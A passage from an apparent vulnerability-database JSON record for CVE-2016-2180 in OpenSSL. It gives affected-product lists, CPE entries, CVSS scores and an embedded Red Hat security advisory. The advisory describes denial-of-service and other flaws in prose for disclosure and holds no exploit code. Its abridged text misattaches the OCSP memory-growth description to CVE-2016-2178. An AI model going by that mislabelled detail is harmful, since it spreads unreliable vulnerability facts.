"vendor": "ibm", "version": "5.2.11" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3.0.1098" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.2" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "92117" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "NVD", "id": "CVE-2016-2180" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2180" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Shi Lei.,The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201607-952" } ], "trust": 0.6 }, "cve": "CVE-2016-2180", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2180", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2180", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2180", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201607-952", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-2180", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2180" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "NVD", "id": "CVE-2016-2180" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The TS_OBJ_print_bio function in crypto/ts/ts_lib.c in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation in OpenSSL through 1.0.2h allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted time-stamp file that is mishandled by the \"openssl ts\" command. Supplementary information : CWE Vulnerability type by CWE-125: Out-of-bounds Read ( Read out of bounds ) Has been identified. OpenSSL is prone to a local denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 